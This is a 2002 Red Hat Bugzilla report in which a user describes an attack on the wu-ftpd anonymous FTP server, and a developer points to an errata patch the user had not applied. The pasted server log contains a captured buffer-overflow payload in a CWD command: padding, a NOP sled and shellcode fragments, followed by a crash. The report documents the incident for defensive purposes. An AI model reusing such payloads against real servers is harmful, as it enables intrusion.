Bugzilla will be upgraded to version 5.0 on a still to be determined date in the near future. The original upgrade date has been delayed.
Bug 66171 - Security hole in FTPD
Security hole in FTPD
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: anonftp (Show other bugs)
6.2
All Linux
medium Severity medium
: ---
: ---
Assigned To: wdovlrrw
David Lawrence
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2002-06-05 15:07 EDT by Need Real Name
Modified: 2007-04-18 12:42 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2002-06-05 15:40:57 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Need Real Name 2002-06-05 15:07:03 EDT
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)

Description of problem:
Attached is a fragment of the log file a few times left by some hacker in my PC.


Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
See "Additional Info"


Actual Results:  The hacker gains access to ~ftp directory.  Thanks god 
it's "chroot"ed.

Expected Results:  FTPD should not be crashed that easly.


Additional info:

Jun  4 22:51:34 hypres ftpd[714]: USER ftp
Jun  4 22:51:34 hypres ftpd[714]: PASS mozilla@
Jun  4 22:51:34 hypres ftpd[714]: ANONYMOUS FTP LOGIN FROM a-na25-23.tin.it 
[212.216.205.22], mozilla@
Jun  4 22:51:35 hypres ftpd[714]: RNFR ././
Jun  4 22:51:59 hypres last message repeated 72 times
Jun  4 22:51:59 hypres ftpd[714]: PWD
Jun  4 22:51:59 hypres ftpd[714]: CWD 
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000PP*P*P*P-
P*P*P*,^E^G^H^X5^H^HP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^L\220\220\220\220\220\220\220\220\220\220\220
\2201QCT^KtQ^K-
^A^A^A^AP\211Pj^DX\211P1P<\200P^N1QPP&P'P9Yj^CXP<\200P^EP%PP*P*P*
Jun  4 22:52:00 hypres ftpd[714]: CWD /pub/.
Jun  4 22:52:00 hypres ftpd[714]: CWD .
Jun  4 22:52:01 hypres ftpd[714]: RNFR ././././././././.
Jun  4 22:52:01 hypres ftpd[714]: CWD 735073
Jun  4 22:52:01 hypres ftpd[714]: CWD 73507
Jun  4 22:52:02 hypres ftpd[714]: CWD 7350P
Jun  4 22:52:02 hypres ftpd[714]: RNFR .
Jun  4 22:52:02 hypres ftpd[714]: RNFR ./././././././.
Jun  4 22:52:02 hypres ftpd[714]: exiting on signal 11: Segmentation fault
Jun  4 22:52:02 hypres inetd[848]: pid 714: exit status 1
Comment 1 Bernhard Rosenkraenzer 2002-06-05 15:10:01 EDT
Did you install all errata packages? This looks a lot like a problem we fixed
some months ago.
Comment 2 Need Real Name 2002-06-05 15:40:51 EDT
Oh, right you are.  I did download the patch for wu-ftpd, but forgot to upgrate 
it.  My falt, - sorry.  Thanks a lot!

Note You need to log in before you can comment on or make changes to this bug.